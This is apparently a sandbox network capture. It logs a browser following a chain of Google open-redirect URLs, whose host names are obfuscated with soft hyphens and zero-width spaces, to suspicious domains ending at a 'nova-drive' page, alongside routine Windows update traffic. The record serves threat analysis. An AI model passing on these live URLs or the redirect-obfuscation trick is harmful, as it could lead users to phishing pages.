                                                                                                                                                                2024-11-23 19:35:44 UTC2297OUTGET /url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbx [TRUNCATED]
                                                                                                                                                                Host: www.google.co.kr
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:35:45 UTC1098INHTTP/1.1 302 Found
                                                                                                                                                                Location: https://www.google.co.kr/amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy
                                                                                                                                                                Cache-Control: private
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-LrafVIHkIKkX4sdBN54bqQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:45 GMT
                                                                                                                                                                Server: gws
                                                                                                                                                                Content-Length: 334
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                Set-Cookie: NID=519=kq5MkJO1zljhjOJtrh1ul20wWPGKDqvGMA4lX6yK0tbkSZM30KMqYSaXzv9h90ecm2I2DcAeuYHYSUUzXy9hqMvpjZRjjC7xqQXob6smgw4VwY6Vlyz1uNTGmCPJuUvfletIVfYmA7dZXeuopyMeR1V8fEGp0OB7qIg8tqH5BeXB8dPF-v7uyjyp95eH6GILIJAn; expires=Sun, 25-May-2025 19:35:45 GMT; path=/; domain=.google.co.kr; Secure; HttpOnly; SameSite=none
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:35:45 UTC292INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 6b 72 2f 61 6d 70 2f 68 6d 66 31 62 6e 7a 2e 73 25 43 32 25 41 44 6c 66 25 43 32 25 41 44 70 67 25 43 32 25 41 44 71 25 43 32 25 41 44 71 25 43 32 25 41 44 77 7a 75 25 43 32 25 41 44 78 25 43 32
                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.kr/amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2
                                                                                                                                                                2024-11-23 19:35:45 UTC42INData Raw: 25 38 42 2f 6e 37 62 72 6e 78 31 69 79 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                Data Ascii: %8B/n7brnx1iy">here</A>.</BODY></HTML>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.449735172.217.17.674434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:45 UTC1122OUTGET /amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy HTTP/1.1
                                                                                                                                                                Host: www.google.co.kr
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Cookie: NID=519=kq5MkJO1zljhjOJtrh1ul20wWPGKDqvGMA4lX6yK0tbkSZM30KMqYSaXzv9h90ecm2I2DcAeuYHYSUUzXy9hqMvpjZRjjC7xqQXob6smgw4VwY6Vlyz1uNTGmCPJuUvfletIVfYmA7dZXeuopyMeR1V8fEGp0OB7qIg8tqH5BeXB8dPF-v7uyjyp95eH6GILIJAn
                                                                                                                                                                2024-11-23 19:35:46 UTC838INHTTP/1.1 302 Found
                                                                                                                                                                Location: http://hmf1bnz.slfpgqqwzuxppnscs.com/n7brnx1iy
                                                                                                                                                                Cache-Control: private
                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-faibWMp45lEqkvzwRS1YAg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:45 GMT
                                                                                                                                                                Server: gws
                                                                                                                                                                Content-Length: 266
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:35:46 UTC266INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 68 6d 66 31 62 6e 7a 2e 73 c2 ad 6c 66 c2 ad 70 67 c2 ad 71 c2 ad 71 c2 ad 77 7a 75 c2 ad 78 c2 ad 70 70 6e 73 c2 ad 63 c2 ad 73 c2 ad 2e 63 6f 6d e2 80 8b 2f 6e 37 62 72 6e 78 31 69 79 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44
                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://hmf1bnz.slfpgqqwzuxppnscs.com/n7brnx1iy">here</A>.</BOD


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.4497402.23.161.164443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:47 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                2024-11-23 19:35:48 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                Server: Kestrel
                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                X-OSID: 2
                                                                                                                                                                X-CID: 2
                                                                                                                                                                X-CCC: GB
                                                                                                                                                                Cache-Control: public, max-age=223059
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:47 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                X-CID: 2


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.4497432.23.161.164443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:49 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                2024-11-23 19:35:50 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                X-CID: 11
                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                X-Ms-Region: prod-neu-z1
                                                                                                                                                                Cache-Control: public, max-age=222993
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:49 GMT
                                                                                                                                                                Content-Length: 55
                                                                                                                                                                Connection: close
                                                                                                                                                                X-CID: 2
                                                                                                                                                                2024-11-23 19:35:50 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.44974487.121.86.724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:50 UTC681OUTGET /n7brnx1iy HTTP/1.1
                                                                                                                                                                Host: hmf1bnz.slfpgqqwzuxppnscs.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:35:52 UTC262INHTTP/1.1 302 Found
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Location: https://fdFxhDQ0BY6.xkndniwljldraoauu.com/b60Y1l4ML2bf2c0d1bdac2add0860270975885c41b60j673f6b50fb5bd5403fd85206
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:52 GMT
                                                                                                                                                                Content-Length: 134
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:35:52 UTC134INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 64 46 78 68 44 51 30 42 59 36 2e 78 6b 6e 64 6e 69 77 6c 6a 6c 64 72 61 6f 61 75 75 2e 63 6f 6d 2f 62 36 30 59 31 6c 34 4d 4c 32 62 66 32 63 30 64 31 62 64 61 63 32 61 64 64 30 38 36 30 32 37 30 39 37 35 38 38 35 63 34 31 62 36 30 6a 36 37 33 66 36 62 35 30 66 62 35 62 64 35 34 30 33 66 64 38 35 32 30 36 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                Data Ascii: <a href="https://fdFxhDQ0BY6.xkndniwljldraoauu.com/b60Y1l4ML2bf2c0d1bdac2add0860270975885c41b60j673f6b50fb5bd5403fd85206">Found</a>.


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.44974587.120.114.1724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:54 UTC745OUTGET /b60Y1l4ML2bf2c0d1bdac2add0860270975885c41b60j673f6b50fb5bd5403fd85206 HTTP/1.1
                                                                                                                                                                Host: fdfxhdq0by6.xkndniwljldraoauu.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:35:55 UTC283INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Location: https://www.google.com/amp/nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:55 GMT
                                                                                                                                                                Content-Length: 155
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:35:55 UTC155INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 6d 70 2f 6e 6f 76 61 2d 64 72 69 76 65 2e 78 6b 6e 64 6e 69 77 6c 6a 6c 64 72 61 6f 61 75 75 2e 63 6f 6d 2f 61 70 70 32 62 66 32 63 30 64 31 62 64 61 63 32 61 64 64 30 38 36 30 32 37 30 39 37 35 38 38 35 63 34 31 2f 36 37 33 66 36 62 35 30 66 62 35 62 64 35 34 30 33 66 64 38 35 32 30 36 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                Data Ascii: <a href="https://www.google.com/amp/nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206">Moved Permanently</a>.


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.449739142.250.181.1004434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:55 UTC754OUTGET /amp/nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206 HTTP/1.1
                                                                                                                                                                Host: www.google.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:35:56 UTC1256INHTTP/1.1 302 Found
                                                                                                                                                                Location: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206
                                                                                                                                                                Cache-Control: private
                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-2aRQVztAq39YolTJQhY8cw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:56 GMT
                                                                                                                                                                Server: gws
                                                                                                                                                                Content-Length: 297
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                Set-Cookie: NID=519=LTDE-k3S3OEfgnatKbZk1oOWxUP7O_CNQuQ6oxXHYuJcwXgMJQAnHD5Cg7m7cJoQZdduQa6-DfODBr7eSMcLCDwr61_qVMgd2yEdRYrKrGWoG4b6eEHBzQgvOi-Qk81KMZ5iqShARkHBgBS9XrCAcNZxksNnUk6TLd9TOvcem6o93h-rkYRfkdjA1M8jGJG0lCHz; expires=Sun, 25-May-2025 19:35:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:35:56 UTC134INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31
                                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1
                                                                                                                                                                2024-11-23 19:35:56 UTC163INData Raw: 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 6e 6f 76 61 2d 64 72 69 76 65 2e 78 6b 6e 64 6e 69 77 6c 6a 6c 64 72 61 6f 61 75 75 2e 63 6f 6d 2f 61 70 70 32 62 66 32 63 30 64 31 62 64 61 63 32 61 64 64 30 38 36 30 32 37 30 39 37 35 38 38 35 63 34 31 2f 36 37 33 66 36 62 35 30 66 62 35 62 64 35 34 30 33 66 64 38 35 32 30 36 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                Data Ascii: >The document has moved<A HREF="http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206">here</A>.</BODY></HTML>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.44974620.12.23.50443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:35:58 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3dlPWuYzpmE9uAb&MD=Snkb7rNX HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                2024-11-23 19:35:59 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                Expires: -1
                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                MS-CorrelationId: b659cec0-4fa3-4a98-aa9d-809f36079a4a
                                                                                                                                                                MS-RequestId: 11b11e2b-7e92-4ad1-b8cc-e296b5c5fb91
                                                                                                                                                                MS-CV: hF1mJxDzCEOm9RYd.0
                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:58 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                2024-11-23 19:35:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
